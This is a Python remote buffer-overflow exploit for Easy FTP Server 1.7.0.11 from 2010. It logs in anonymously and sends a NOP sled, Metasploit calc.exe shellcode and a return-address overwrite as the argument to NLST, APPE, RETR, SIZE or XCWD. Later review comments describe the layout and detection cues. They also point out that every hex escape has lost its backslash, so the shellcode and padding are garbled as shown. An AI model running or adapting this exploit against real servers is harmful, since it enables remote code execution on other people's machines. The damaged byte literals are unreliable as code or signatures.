# Title : EASYFTP BOF Vulnerabilities in NLST, NLST -al, APPE, RETR, SIZE and XCWD Commands
# Published : 2010-08-10
# Author : Rabih Mohsen
# Exploit Title: Easy FTP Server v1.7.0.11 NLST, NLST -al, APPE, RETR, SIZE and XCWD Commands Remote Buffer Overflow Exploit
# Date: 10/8/2010
# Author: Rabih Mohsen
# Software Link: http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip
# Version: 1.7.0.11
# Tested on: Windows XP SP3
# CVE:
import socket
import sys
# Overflow buffer layout, as assembled in GenericEasyFTPExploit below:
#   <verb> + nopsled + shellcode + payload + eip + <line end>
# buffersize is the total length the author reports is needed to reach the
# saved return address for the listed verbs (see the header comment).
buffersize = 272
# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ]
# NOTE(review): in this copy every "\xNN" escape has lost its backslash, so
# these literals are plain ASCII text ("x90" is three characters, not one
# 0x90 byte). len(shellcode) is therefore not 228 and the padding arithmetic
# below does not yield the 272-byte layout the comments describe; do not use
# these literals verbatim as byte-level signatures.
shellcode = ("xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1"
"x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5"
"xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69"
"xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2e"
"x8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8"
"x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08"
"xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8c"
"x61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0c"
"xd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80"
"x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6b"
"xe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84"
"xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14"
"x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4c"
"xabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0e"
"xd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8"
"x51x6bx28")
# Return-address overwrite. The address is tied to the user32.dll build of
# the platform the header says this was tested on (Windows XP SP3); it is
# not expected to be valid elsewhere.
eip = "x91xC8x41x7E" # CALL EDI - user32.dll
# Leading NOP run placed directly after the FTP verb.
nopsled = "x90" * 16
# Despite the name, this is filler: NOPs that pad nopsled+shellcode out to
# buffersize so that eip lands at the expected offset.
payload = "x90" * (buffersize-(len(nopsled)+len(shellcode)))
# target, CMDS: any of "NLST, NLST -al, APPE, RETR, SIZE and XCWD"
def GenericEasyFTPExploit(target, CMDS):
    """Deliver the module-level overflow buffer to one FTP verb on *target*.

    Sequence, in order: connect to TCP/21, read the banner, send ``User
    anonymous``, read the reply, send ``PASS anonymous``, then immediately
    send ``CMDS`` followed by ``nopsled+shellcode+payload+eip`` as the
    verb's argument, read one reply, send QUIT and close the socket.

    Args:
        target: host name or IP of the FTP server (argv[1] at the bottom of
            the file).
        CMDS: the FTP verb to send; the header lists NLST, NLST -al, APPE,
            RETR, SIZE and XCWD as affected.

    Returns:
        None. Every server reply is read with recv(1024) and discarded, so
        the function gives no indication of success or failure.

    Detection notes (from what this function sends): an anonymous login
    followed by one of the listed verbs whose argument is sized to
    ``buffersize`` (272) and starts with a run of 0x90 bytes. Restricting
    anonymous login or limiting command-argument length at a filtering
    proxy would both stop this particular script, which relies on both.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # socket.connect() returns None; this local is never used.
    connect = s.connect((target, 21))
    s.recv(1024)  # banner, discarded
    # NOTE(review): line terminators are written as 'rn' in this copy; the
    # literal is reproduced exactly as found.
    s.send('User anonymousrn')
    s.recv(1024)
    s.send('PASS anonymousrn')
    # No reply is read after PASS; the overflow command is sent right away.
    s.send(CMDS +nopsled+shellcode+payload+eip+'rn')
    s.recv(1024)
    s.send('QUIT EASY ftprn')
    # Only reached if none of the calls above raised; there is no
    # try/finally, so an error leaves the socket to the GC.
    s.close()
# Script entry: argv[1] is the target host, argv[2] the FTP verb to send
# (one of the six listed in the header). No argument-count check is made,
# so a missing argument raises IndexError here.
target = sys.argv[1]
CMDS = sys.argv[2]
GenericEasyFTPExploit(target=target, CMDS=CMDS)